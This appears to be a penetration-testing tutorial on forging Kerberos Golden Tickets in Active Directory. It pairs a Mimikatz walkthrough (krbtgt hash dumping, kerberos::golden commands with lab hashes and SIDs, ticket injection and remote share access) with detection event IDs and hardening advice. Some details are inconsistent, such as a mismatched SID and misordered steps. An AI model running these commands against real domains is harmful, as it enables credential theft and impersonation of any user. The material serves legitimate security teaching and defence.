With Kerberos, users never directly authenticate themselves to the various services they need to use, such as file servers. Instead, the Kerberos Key Distribution Center (KDC) functions as a trusted third-party authentication service. Every domain controller in an Active Directory domain runs a KDC service.

The KDC issues a ticket granting ticket (TGT), which includes a unique session key and a timestamp that specifies how long that session is valid (normally 8 or 10 hours). When the user needs access to resources, they don’t have to re-authenticate; their client machine simply sends the TGT along to prove that the user has already been recently authenticated.

Kerberos Golden Ticket hacking is a sophisticated attack that exploits weaknesses in the Kerberos authentication protocol, which is widely used for securing authentication in various network environments. In this attack, adversaries create a forged Kerberos Ticket Granting Ticket (TGT), referred to as a "Golden Ticket," allowing them to gain unauthorized access to a network and impersonate any user without the need for valid credentials.

Requirements

Privileged Access:

  • The attacker needs elevated privileges to access the KDC database or extract password hashes, often obtained through a successful compromise of an administrative account.

In a Golden Ticket attack, hackers bypass the KDC and create TGTs themselves to get access to various resources. To forge a TGT, hackers need four key pieces of information:

  • The FQDN (Fully Qualified Domain Name) of the domain
  • The SID (Security Identifier) of the domain
  • The username of the account they want to impersonate
  • The KRBTGT password hash

Exploitation (Mimikatz)

1. After compromising the domain controller, use mimikatz to dump the krbtgt hash

  • lsadump::lsa /inject /name:krbtgt
  • privilege::debug

2. Grab the following (NTLM, SID domain)

  • NTLM : 43ee24a65422dd3e241dda802463c4de
  • Domain : LAB / S-1-5-21-2564449761-2250179813-2142005236
  • aes256_hmac (4096) : 20e985711889035d33aff3f05781370c1d095cf7abf0dcfe9bb64f70c3dc0bea

3.. Generate the Kerberos ticket, assigned to a real user, use the admin account RID (default 500), and set ptt

  • kerberos::golden /User:Administrator /domain:lab.local /sid:S-1-5-21-2564449761-2250179813-2142005236 /krbtgt:43ee24a65422dd3e241dda802463c4de /id:500 /ptt
  • kerberos::golden /User:Administrator /domain:lab.local /sid:S-1-5-21-2564449761-2250179813-2142005236 /krbtgt:43ee24a65422dd3e241dda802463c4de /id:500,513,2668 /ptt /aes256:20e985711889035d33aff3f05781370c1d095cf7abf0dcfe9bb64f70c3dc0bea
  • kerberos::golden /domain:lab.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:43ee24a65422dd3e241dda802463c4de /user:newAdmin /id:500 /ptt

  • /domain — The FQDN of the domain
  • /sid — The SID of the domain
  • /aes256 — The AES-256 password hash of the KRBTGT user (alternatively, /ntlm or /rc4 can be used for NTLM hashes, and /aes128 for AES-128)
  • /user — The username to be impersonated
  • /groups — The list of groups (by RID) to include in the ticket, with the first being the user’s primary group
  • /ptt — Indicates that the forged ticket should be injected into the current session instead of being written to a file

4. Once, the ticket has been generated you can run commands to remote machines, with this command you will open a new CMD

  • misc::cmd

5. List the available tickets

  • klist

5. Test connecting to another machine

  • dir \\client-2\c$

Because the TGT is signed and encrypted with the real KRBTGT password hash, any domain controller will accept it as proof of identity and issue ticket-granting service (TGS) tickets for it.

As the adversary discovers more about the environment, they can continue to mint tickets for accounts with specific group membership to access any application, database or other resource that uses Active Directory for authentication and authorization.

Recommendations

Regularly Rotate Kerberos Service Account Passwords

Minimize the number of accounts that can access the KRBTGT password hash.

Minimize opportunities for hackers to steal privileged credentials.

Monitor and Audit KDC Logs

Regular Security Audits

Detection Methods for the Golden Ticket Attack

Event ID 4769 - A Kerberos Service Ticket was requested.

  • Key Description Fields: Account Name, Service Name, Client Address

Event ID 4624 - An account was successfully logged on.

  • Key Description Fields: Account Name, Account Domain, Logon ID

Event ID 4627 - Identifies the account that requested the logon.

  • Key Description Fields: Security ID, Account Name, Account Domain, Logon ID

References

https://blog.quest.com/golden-ticket-attacks-how-they-work-and-how-to-defend-against-them/

https://www.netwrix.com/how_golden_ticket_attack_works.html

https://www.crowdstrike.com/cybersecurity-101/golden-ticket-attack/

https://www.onasystems.net/golden-ticket-hackeo-a-directorio-activo-en-empresas/

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets

https://www.picussecurity.com/resource/blog/golden-ticket-attack-mitre-t1558.001

https://www.tarlogic.com/blog/kerberos-tickets-comprehension-exploitation/

https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/golden-ticket